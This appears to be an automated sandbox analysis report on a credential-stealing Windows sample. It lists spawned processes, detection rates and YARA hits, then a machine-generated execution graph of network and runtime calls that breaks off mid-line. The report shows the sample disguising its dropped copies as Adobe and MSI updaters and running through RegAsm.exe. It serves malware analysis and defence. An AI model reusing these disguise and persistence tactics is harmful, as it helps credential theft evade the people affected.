                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:6
                                                                                                                                            Start time:15:31:19
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe"
                                                                                                                                            Imagebase:0x860000
                                                                                                                                            File size:315'904 bytes
                                                                                                                                            MD5 hash:C60F5FA3A579BCA2C8C377F7E15B2221
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                            • Detection: 92%, ReversingLabs
                                                                                                                                            • Detection: 77%, Virustotal, Browse
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:7
                                                                                                                                            Start time:15:31:19
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                            Imagebase:0xe10000
                                                                                                                                            File size:65'440 bytes
                                                                                                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1920616270.000000000140A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:8
                                                                                                                                            Start time:15:31:20
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe
                                                                                                                                            Imagebase:0x4f0000
                                                                                                                                            File size:315'904 bytes
                                                                                                                                            MD5 hash:C60F5FA3A579BCA2C8C377F7E15B2221
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                            • Detection: 92%, ReversingLabs
                                                                                                                                            • Detection: 77%, Virustotal, Browse
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:9
                                                                                                                                            Start time:15:31:20
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe
                                                                                                                                            Imagebase:0x270000
                                                                                                                                            File size:315'904 bytes
                                                                                                                                            MD5 hash:C60F5FA3A579BCA2C8C377F7E15B2221
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:10
                                                                                                                                            Start time:15:31:20
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                            Imagebase:0xe90000
                                                                                                                                            File size:65'440 bytes
                                                                                                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:11
                                                                                                                                            Start time:15:31:20
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                            Imagebase:0x20000
                                                                                                                                            File size:65'440 bytes
                                                                                                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1939197101.000000000071D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:14
                                                                                                                                            Start time:15:31:32
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe"
                                                                                                                                            Imagebase:0x8b0000
                                                                                                                                            File size:315'904 bytes
                                                                                                                                            MD5 hash:C60F5FA3A579BCA2C8C377F7E15B2221
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                            • Detection: 92%, ReversingLabs
                                                                                                                                            • Detection: 77%, Virustotal, Browse
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:15
                                                                                                                                            Start time:15:31:32
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                            Imagebase:0xdb0000
                                                                                                                                            File size:65'440 bytes
                                                                                                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:16
                                                                                                                                            Start time:15:31:40
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe"
                                                                                                                                            Imagebase:0xe20000
                                                                                                                                            File size:315'904 bytes
                                                                                                                                            MD5 hash:C60F5FA3A579BCA2C8C377F7E15B2221
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:17
                                                                                                                                            Start time:15:31:40
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                            Imagebase:0xf20000
                                                                                                                                            File size:65'440 bytes
                                                                                                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Disassembly

                                                                                                                                            Reset < >

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:8.1%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:22.4%
                                                                                                                                              Total number of Nodes:2000
                                                                                                                                              Total number of Limit Nodes:23
                                                                                                                                              execution_graph 17833 d323c0 17834 d32870 17833->17834 17852 d323fe std::_Throw_Cpp_error __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 17833->17852 17835 d32447 setsockopt recv WSAGetLastError 17835->17834 17835->17852 17837 d3285b Sleep 17837->17834 17837->17852 17839 d327c8 recv 17840 d3284d Sleep 17839->17840 17840->17837 17842 d324d8 recv 17843 d324f9 recv 17842->17843 17842->17852 17843->17852 17844 c76930 15 API calls 17848 d32561 setsockopt recv 17844->17848 17847 d32885 17984 c93500 17847->17984 17848->17852 17852->17835 17852->17837 17852->17839 17852->17840 17852->17844 17852->17847 17853 d33150 WSAStartup 17852->17853 17862 c76930 17852->17862 17873 c74090 17852->17873 17882 d32890 17852->17882 17961 c8d8f9 17852->17961 17964 c681e0 17852->17964 17854 d33256 17853->17854 17856 d33188 17853->17856 17854->17852 17855 d33250 WSACleanup 17855->17854 17856->17854 17856->17855 17857 d33214 socket 17856->17857 17861 d33246 17856->17861 17857->17855 17858 d3322a connect 17857->17858 17860 d3323c closesocket 17858->17860 17858->17861 17859 d33270 17859->17852 17860->17857 17860->17861 17861->17855 17861->17859 17863 c76981 17862->17863 17867 c76952 std::locale::_Setgloballocale 17862->17867 17864 c76a86 17863->17864 17865 c76990 17863->17865 18001 c63110 17864->18001 17987 c636f0 17865->17987 17867->17842 17869 c93500 std::_Throw_Cpp_error 14 API calls 17870 c76a90 17869->17870 17871 c769d6 std::_Locinfo::_Locinfo_ctor std::locale::_Setgloballocale 17871->17869 17872 c76a3d std::_Throw_Cpp_error std::_Locinfo::_Locinfo_ctor std::locale::_Setgloballocale 17871->17872 17872->17842 17874 c740b8 17873->17874 17875 c740c2 17874->17875 17876 c7412c 17874->17876 17878 c740c7 17875->17878 17880 c636f0 std::_Throw_Cpp_error 15 API calls 17875->17880 17877 c63110 std::_Throw_Cpp_error 15 API calls 17876->17877 17879 c74131 17877->17879 17878->17852 17879->17852 17881 c7410a std::_Locinfo::_Locinfo_ctor 17880->17881 17881->17852 17883 d328e3 17882->17883 17884 d32946 17882->17884 17885 c681e0 18 API calls 17883->17885 17886 d32970 17884->17886 17887 d3294e 17884->17887 17920 d32909 17885->17920 17889 d32978 17886->17889 17890 d3299d 17886->17890 18353 c73df0 17887->18353 17891 c73df0 15 API calls 17889->17891 17892 d329a5 17890->17892 17893 d329cc 17890->17893 17891->17920 17896 c73df0 15 API calls 17892->17896 17892->17920 17894 d329f2 17893->17894 17895 d329d4 17893->17895 17899 d32a12 17894->17899 17900 d32f16 17894->17900 17894->17920 18363 c9bb47 17895->18363 17896->17920 17898 d32941 std::_Throw_Cpp_error 17898->17852 18265 c64b10 17899->18265 17902 d32f54 17900->17902 17903 d32f1e 17900->17903 17901 c93500 std::_Throw_Cpp_error 14 API calls 17905 d330bd 17901->17905 17907 d32f92 17902->17907 17908 d32f5c 17902->17908 18392 c786a0 17903->18392 17909 c93500 std::_Throw_Cpp_error 14 API calls 17905->17909 17910 d32fd0 17907->17910 17911 d32f9a 17907->17911 17913 c786a0 20 API calls 17908->17913 17914 d330c2 setsockopt 17909->17914 17916 d32fd8 17910->17916 17917 d3300e 17910->17917 17915 c786a0 20 API calls 17911->17915 17919 d32f79 17913->17919 17914->17852 17921 d32fb7 17915->17921 17922 c786a0 20 API calls 17916->17922 17923 d33016 17917->17923 17924 d3304c 17917->17924 17925 c71960 15 API calls 17919->17925 17920->17898 17920->17901 17926 c71960 15 API calls 17921->17926 17927 d32ff5 17922->17927 17928 c786a0 20 API calls 17923->17928 17924->17920 18404 cb3390 17924->18404 17925->17920 17926->17920 17932 c71960 15 API calls 17927->17932 17929 d33033 17928->17929 17933 c71960 15 API calls 17929->17933 17932->17920 17933->17920 17934 d33066 18412 c73fa0 17934->18412 17938 c631c0 std::_Throw_Cpp_error 14 API calls 17938->17920 17939 d32a34 std::_Throw_Cpp_error 17939->17905 17939->17920 17940 d32c75 17939->17940 18275 c634e0 17939->18275 18283 c7c4c0 17939->18283 18322 c632a0 17940->18322 17944 d32ca7 18339 c631c0 17944->18339 17946 d32cb6 17947 d32d54 17946->17947 17948 d32d7c 17946->17948 17950 c74090 std::_Throw_Cpp_error 15 API calls 17947->17950 18344 c940b0 17948->18344 17952 d32d6d 17950->17952 18369 d3b380 17952->18369 17956 c631c0 std::_Throw_Cpp_error 14 API calls 17956->17920 17957 c631c0 std::_Throw_Cpp_error 14 API calls 17959 d32d74 17957->17959 17959->17957 17960 d32ea0 std::_Throw_Cpp_error 17959->17960 17960->17905 17960->17956 20685 c8dead 17961->20685 17965 c74090 std::_Throw_Cpp_error 15 API calls 17964->17965 17968 c6822d 17965->17968 17966 c631c0 std::_Throw_Cpp_error 14 API calls 17967 c68392 17966->17967 17969 c76930 15 API calls 17967->17969 17971 c683dd std::_Locinfo::_Locinfo_ctor 17967->17971 17968->17966 17969->17971 17970 c684b0 GetModuleHandleA GetProcAddress WSASend 17970->17971 17972 c6859e std::_Throw_Cpp_error 17970->17972 17971->17970 17971->17972 17973 c93500 std::_Throw_Cpp_error 14 API calls 17972->17973 17974 c6860a std::_Throw_Cpp_error 17972->17974 17976 c68637 std::_Throw_Cpp_error 17973->17976 17974->17852 17975 c686a9 std::_Throw_Cpp_error 17975->17852 17976->17975 17977 c93500 14 API calls std::_Throw_Cpp_error 17976->17977 17978 c687cd 17976->17978 17977->17976 17979 c93500 std::_Throw_Cpp_error 14 API calls 17978->17979 17980 c687d2 17979->17980 17981 c753e6 std::_Throw_Cpp_error 17980->17981 17982 c93500 std::_Throw_Cpp_error 14 API calls 17980->17982 17981->17852 17983 c7540e 17982->17983 17985 c9343c ___std_exception_copy 14 API calls 17984->17985 17986 c9350f __Getctype 17985->17986 17988 c63726 17987->17988 17989 c63702 17987->17989 17990 c63738 17988->17990 17993 c8df02 std::_Facet_Register 15 API calls 17988->17993 17991 c6373f 17989->17991 17992 c63709 17989->17992 17990->17871 18016 c63070 17991->18016 18007 c8df02 17992->18007 17996 c63730 17993->17996 17996->17871 17997 c6370f 17998 c93500 std::_Throw_Cpp_error 14 API calls 17997->17998 17999 c63718 17997->17999 18000 c63749 17998->18000 17999->17871 18251 c8c579 18001->18251 18009 c8df07 18007->18009 18010 c8df21 18009->18010 18013 c63070 Concurrency::cancel_current_task 18009->18013 18020 c9cc7c 18009->18020 18035 ca0319 18009->18035 18010->17997 18012 c8df2d 18012->18012 18013->18012 18027 c8f3a5 18013->18027 18017 c6307e Concurrency::cancel_current_task 18016->18017 18018 c8f3a5 ___std_exception_copy 15 API calls 18017->18018 18019 c630b3 18018->18019 18019->17997 18026 ca5924 __Getctype 18020->18026 18021 ca5962 18038 c9bf8f 18021->18038 18023 ca594d RtlAllocateHeap 18024 ca5960 18023->18024 18023->18026 18024->18009 18025 ca0319 std::_Facet_Register 2 API calls 18025->18026 18026->18021 18026->18023 18026->18025 18028 c8f3b2 18027->18028 18033 c630b3 18027->18033 18029 c9cc7c ___std_exception_copy 10 API calls 18028->18029 18028->18033 18030 c8f3cf 18029->18030 18034 c8f3df 18030->18034 18156 ca4235 18030->18156 18033->17997 18165 c9c526 18034->18165 18240 ca0345 18035->18240 18041 ca4823 GetLastError 18038->18041 18042 ca4839 18041->18042 18046 ca483f 18041->18046 18063 ca5eec 18042->18063 18060 c9bf94 18046->18060 18068 ca5f2b 18046->18068 18049 ca4878 18051 ca5f2b __Getctype 2 API calls 18049->18051 18050 ca4889 18052 ca5f2b __Getctype 2 API calls 18050->18052 18053 ca4886 18051->18053 18054 ca4895 18052->18054 18078 ca58aa 18053->18078 18055 ca4899 18054->18055 18056 ca48b0 18054->18056 18059 ca5f2b __Getctype 2 API calls 18055->18059 18084 ca4500 18056->18084 18059->18053 18060->18024 18062 ca58aa ___std_exception_destroy 8 API calls 18062->18060 18089 ca5cd9 18063->18089 18066 ca5f23 TlsGetValue 18067 ca5f11 18067->18046 18069 ca5cd9 std::locale::_Setgloballocale 2 API calls 18068->18069 18070 ca485b 18069->18070 18070->18060 18071 ca4eea 18070->18071 18072 ca4ef7 __Getctype 18071->18072 18073 ca4f37 18072->18073 18074 ca4f22 RtlAllocateHeap 18072->18074 18077 ca0319 std::_Facet_Register 2 API calls 18072->18077 18076 c9bf8f ___std_exception_copy 8 API calls 18073->18076 18074->18072 18075 ca4870 18074->18075 18075->18049 18075->18050 18076->18075 18077->18072 18079 ca58df 18078->18079 18080 ca58b5 RtlFreeHeap 18078->18080 18079->18060 18080->18079 18081 ca58ca GetLastError 18080->18081 18082 ca58d7 ___std_exception_destroy 18081->18082 18083 c9bf8f ___std_exception_copy 7 API calls 18082->18083 18083->18079 18100 ca4394 18084->18100 18090 ca5d09 18089->18090 18094 ca5d05 18089->18094 18090->18094 18096 ca5c0e 18090->18096 18093 ca5d23 GetProcAddress 18093->18094 18095 ca5d33 std::locale::_Setgloballocale 18093->18095 18094->18066 18094->18067 18095->18094 18099 ca5c1f std::locale::_Setgloballocale 18096->18099 18097 ca5c58 GetLastError 18097->18099 18098 ca5cb5 18098->18093 18098->18094 18099->18097 18099->18098 18101 ca43a0 std::_Locinfo::_Locinfo_ctor 18100->18101 18114 c9eadb RtlEnterCriticalSection 18101->18114 18103 ca43aa 18115 ca43da 18103->18115 18106 ca44a6 18107 ca44b2 std::_Locinfo::_Locinfo_ctor 18106->18107 18119 c9eadb RtlEnterCriticalSection 18107->18119 18109 ca44bc 18120 ca4687 18109->18120 18111 ca44d4 18124 ca44f4 18111->18124 18114->18103 18118 c9eb23 RtlLeaveCriticalSection 18115->18118 18117 ca43c8 18117->18106 18118->18117 18119->18109 18121 ca4696 __Getctype 18120->18121 18123 ca46bd __Getctype 18120->18123 18121->18123 18127 cac9d7 18121->18127 18123->18111 18155 c9eb23 RtlLeaveCriticalSection 18124->18155 18126 ca44e2 18126->18062 18128 caca57 18127->18128 18131 cac9ed 18127->18131 18129 cacaa5 18128->18129 18132 ca58aa ___std_exception_destroy 9 API calls 18128->18132 18130 cacb48 __Getctype 9 API calls 18129->18130 18142 cacab3 18130->18142 18131->18128 18133 caca20 18131->18133 18137 ca58aa ___std_exception_destroy 9 API calls 18131->18137 18134 caca79 18132->18134 18135 caca42 18133->18135 18144 ca58aa ___std_exception_destroy 9 API calls 18133->18144 18136 ca58aa ___std_exception_destroy 9 API calls 18134->18136 18139 ca58aa ___std_exception_destroy 9 API calls 18135->18139 18138 caca8c 18136->18138 18143 caca15 18137->18143 18145 ca58aa ___std_exception_destroy 9 API calls 18138->18145 18140 caca4c 18139->18140 18146 ca58aa ___std_exception_destroy 9 API calls 18140->18146 18141 cacb13 18147 ca58aa ___std_exception_destroy 9 API calls 18141->18147 18142->18141 18148 ca58aa 9 API calls ___std_exception_destroy 18142->18148 18149 cabcdb __Getctype 9 API calls 18143->18149 18150 caca37 18144->18150 18151 caca9a 18145->18151 18146->18128 18152 cacb19 18147->18152 18148->18142 18149->18133 18153 cac13a __Getctype 9 API calls 18150->18153 18154 ca58aa ___std_exception_destroy 9 API calls 18151->18154 18152->18123 18153->18135 18154->18129 18155->18126 18157 ca4243 18156->18157 18158 ca4251 18156->18158 18157->18158 18163 ca4269 18157->18163 18159 c9bf8f ___std_exception_copy 9 API calls 18158->18159 18160 ca4259 18159->18160 18168 c934f0 18160->18168 18162 ca4263 18162->18034 18163->18162 18164 c9bf8f ___std_exception_copy 9 API calls 18163->18164 18164->18160 18166 ca58aa ___std_exception_destroy 9 API calls 18165->18166 18167 c9c53e 18166->18167 18167->18033 18171 c9343c 18168->18171 18172 c9344e ___std_exception_copy 18171->18172 18177 c93473 18172->18177 18174 c93466 18186 c9322c 18174->18186 18178 c9348a 18177->18178 18179 c93483 18177->18179 18182 c93498 18178->18182 18196 c93268 18178->18196 18192 c93291 GetLastError 18179->18192 18182->18174 18183 c934bf __Getctype 18183->18182 18184 c9343c ___std_exception_copy 14 API calls 18183->18184 18185 c934fc 18184->18185 18185->18174 18187 c93238 18186->18187 18188 c9324f 18187->18188 18222 c932d7 18187->18222 18190 c93262 18188->18190 18191 c932d7 ___std_exception_copy 14 API calls 18188->18191 18190->18162 18191->18190 18193 c932aa 18192->18193 18200 ca48d4 18193->18200 18197 c9328c 18196->18197 18198 c93273 GetLastError 18196->18198 18197->18183 18199 c93288 18198->18199 18199->18183 18201 ca48ed 18200->18201 18202 ca48e7 18200->18202 18204 ca5f2b __Getctype GetLastError GetProcAddress 18201->18204 18206 c932c2 18201->18206 18203 ca5eec __Getctype GetLastError GetProcAddress TlsGetValue 18202->18203 18203->18201 18205 ca4907 18204->18205 18205->18206 18207 ca4eea __Getctype 9 API calls 18205->18207 18206->18178 18208 ca4917 18207->18208 18209 ca491f 18208->18209 18210 ca4934 18208->18210 18212 ca5f2b __Getctype GetLastError GetProcAddress 18209->18212 18211 ca5f2b __Getctype GetLastError GetProcAddress 18210->18211 18214 ca4940 18211->18214 18213 ca492b 18212->18213 18217 ca58aa ___std_exception_destroy 9 API calls 18213->18217 18215 ca4953 18214->18215 18216 ca4944 18214->18216 18219 ca4500 __Getctype 9 API calls 18215->18219 18218 ca5f2b __Getctype GetLastError GetProcAddress 18216->18218 18217->18206 18218->18213 18220 ca495e 18219->18220 18221 ca58aa ___std_exception_destroy 9 API calls 18220->18221 18221->18206 18223 c932ea 18222->18223 18224 c932e1 18222->18224 18223->18188 18225 c93291 ___std_exception_copy 10 API calls 18224->18225 18226 c932e6 18225->18226 18226->18223 18229 c9ea56 18226->18229 18230 ca9eae std::locale::_Setgloballocale RtlEnterCriticalSection RtlLeaveCriticalSection 18229->18230 18231 c9ea5b 18230->18231 18232 ca9ef3 std::locale::_Setgloballocale 14 API calls 18231->18232 18234 c9ea66 std::locale::_Setgloballocale 18231->18234 18232->18234 18233 c9df72 std::locale::_Setgloballocale 10 API calls 18236 c9ea99 18233->18236 18234->18233 18235 ca6084 std::locale::_Setgloballocale GetLastError GetProcAddress 18235->18236 18236->18235 18237 c9eace 18236->18237 18238 c932f3 18236->18238 18239 c9eaf2 __Getctype RtlDeleteCriticalSection 18237->18239 18239->18238 18241 ca0351 std::_Locinfo::_Locinfo_ctor 18240->18241 18246 c9eadb RtlEnterCriticalSection 18241->18246 18243 ca035c std::locale::_Setgloballocale 18247 ca0393 18243->18247 18246->18243 18250 c9eb23 RtlLeaveCriticalSection 18247->18250 18249 ca0324 18249->18009 18250->18249 18256 c8c33f 18251->18256 18253 c8c58a Concurrency::cancel_current_task 18259 c8c394 18253->18259 18255 c8c5aa Concurrency::cancel_current_task 18262 c638e0 18256->18262 18260 c638e0 std::regex_error::regex_error 15 API calls 18259->18260 18261 c8c3a6 18260->18261 18261->18255 18263 c8f3a5 ___std_exception_copy 15 API calls 18262->18263 18264 c6390d 18263->18264 18264->18253 18416 c8d429 18265->18416 18268 c64b20 18269 c64b29 18268->18269 18271 c8cdc4 std::_Throw_Cpp_error 21 API calls 18268->18271 18269->17939 18272 c64b40 18271->18272 18425 c93dcc 18272->18425 18276 c63568 18275->18276 18278 c634f2 18275->18278 18279 c63110 std::_Throw_Cpp_error 15 API calls 18276->18279 18277 c634f7 std::_Locinfo::_Locinfo_ctor 18277->17939 18278->18277 18281 c636f0 std::_Throw_Cpp_error 15 API calls 18278->18281 18280 c6356d 18279->18280 18280->17939 18282 c63543 std::_Locinfo::_Locinfo_ctor 18281->18282 18282->17939 18284 c7c55d 18283->18284 18290 c7c4e2 std::_Locinfo::_Locinfo_ctor 18283->18290 18285 c7c64c 18284->18285 18286 c7c56c 18284->18286 18287 c63110 std::_Throw_Cpp_error 15 API calls 18285->18287 18288 c636f0 std::_Throw_Cpp_error 15 API calls 18286->18288 18292 c7c5b1 std::_Locinfo::_Locinfo_ctor 18287->18292 18288->18292 18289 c93500 std::_Throw_Cpp_error 14 API calls 18293 c7c656 18289->18293 18290->17939 18292->18289 18297 c7c60c std::_Throw_Cpp_error std::_Locinfo::_Locinfo_ctor 18292->18297 18295 c7c6d4 18293->18295 18314 c7c6b2 18293->18314 18945 c854c0 18293->18945 18294 c7c85c 18296 c7c877 18294->18296 18300 c7c8d5 18294->18300 18301 c7c8f5 18294->18301 18302 c7c911 18294->18302 18303 c7c91e 18294->18303 18304 c7c8b9 18294->18304 18317 c7c764 18295->18317 18974 c7cad0 18295->18974 18296->17939 18297->17939 18306 c7cb60 15 API calls 18300->18306 18307 c7cb60 15 API calls 18301->18307 18940 c7d3c0 18302->18940 18989 c7cc10 18303->18989 18985 c7cb60 18304->18985 18311 c7c8ef 18306->18311 18312 c7c90b 18307->18312 18311->17939 18312->17939 18314->18295 18316 c854c0 15 API calls 18314->18316 18319 c7c748 18314->18319 18315 c7c925 18315->17939 18316->18319 18317->17939 18318 c7c7bc 18318->18294 18318->18296 18321 c854c0 15 API calls 18318->18321 18978 c7d1e0 18318->18978 18319->18317 18970 c7dd20 18319->18970 18321->18318 18323 c634e0 std::_Throw_Cpp_error 15 API calls 18322->18323 18324 c632c5 18323->18324 18325 d42cc0 18324->18325 18326 d42d4d 18325->18326 18338 d42d56 std::locale::_Setgloballocale 18325->18338 19186 c7b0c0 18326->19186 18329 d42f2d 18330 c73df0 15 API calls 18329->18330 18332 d42f31 18329->18332 18330->18332 18333 d42f5a std::_Throw_Cpp_error 18332->18333 18334 c93500 std::_Throw_Cpp_error 14 API calls 18332->18334 18333->17944 18335 d42f94 18334->18335 18336 c8d8f9 __Xtime_get_ticks GetSystemTimePreciseAsFileTime 18335->18336 18337 d42fa6 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 18336->18337 18337->17944 18338->18329 18338->18332 19209 d60bf0 18338->19209 19221 c80560 18338->19221 18340 c631cb 18339->18340 18341 c631e6 std::_Throw_Cpp_error 18339->18341 18340->18341 18342 c93500 std::_Throw_Cpp_error 14 API calls 18340->18342 18341->17946 18343 c6320a 18342->18343 19255 c93fee 18344->19255 18347 c9beb8 18348 c9becb ___std_exception_copy 18347->18348 19306 c9bc9a 18348->19306 18350 c9bee0 18351 c9322c ___std_exception_copy 14 API calls 18350->18351 18352 c9beed 18351->18352 18386 c97938 18352->18386 18356 c73e03 std::_Locinfo::_Locinfo_ctor 18353->18356 18357 c73e34 18353->18357 18354 c73ee0 18355 c63110 std::_Throw_Cpp_error 15 API calls 18354->18355 18358 c73ee5 18355->18358 18356->17920 18357->18354 18359 c636f0 std::_Throw_Cpp_error 15 API calls 18357->18359 18360 c73e7f std::_Locinfo::_Locinfo_ctor 18359->18360 18361 c73ebf std::_Throw_Cpp_error 18360->18361 18362 c93500 std::_Throw_Cpp_error 14 API calls 18360->18362 18361->17920 18362->18354 18364 c9bb5a ___std_exception_copy 18363->18364 19469 c97f35 18364->19469 18366 c9bb74 18367 c9322c ___std_exception_copy 14 API calls 18366->18367 18368 c9bb81 18367->18368 18368->17920 18370 d3b3f0 std::locale::_Setgloballocale 18369->18370 18371 d3b569 18370->18371 18372 d3b72e 18370->18372 19518 c7b4a0 18371->19518 18374 c63110 std::_Throw_Cpp_error 15 API calls 18372->18374 18376 d3b733 18374->18376 18375 d3b58f 18378 c76aa0 std::_Throw_Cpp_error 15 API calls 18375->18378 18377 c93500 std::_Throw_Cpp_error 14 API calls 18376->18377 18384 d3b651 std::_Throw_Cpp_error 18377->18384 18379 d3b5b5 18378->18379 18379->18376 18380 d3b616 std::_Throw_Cpp_error 18379->18380 19522 c63820 18380->19522 18381 c93500 std::_Throw_Cpp_error 14 API calls 18382 d3b73d 18381->18382 18382->17959 18384->18381 18385 d3b711 std::_Throw_Cpp_error 18384->18385 18385->17959 18387 c9794b ___std_exception_copy 18386->18387 19756 c97813 18387->19756 19845 c75ab0 18392->19845 18394 c786f6 19862 c7e940 18394->19862 18398 c78761 19940 c7a4e0 18398->19940 18400 c7876c 18401 c71960 18400->18401 18402 c71940 15 API calls 18401->18402 18403 c71991 18402->18403 18403->17920 20655 cb3450 18404->20655 18406 cb33ba std::_Locinfo::_Locinfo_ctor 18407 c634e0 std::_Throw_Cpp_error 15 API calls 18406->18407 18408 cb3405 18407->18408 18409 cb342b std::_Throw_Cpp_error 18408->18409 18410 c93500 std::_Throw_Cpp_error 14 API calls 18408->18410 18409->17934 18411 cb344c 18410->18411 18413 c73fb3 18412->18413 18414 c73fae 18412->18414 18413->17938 18415 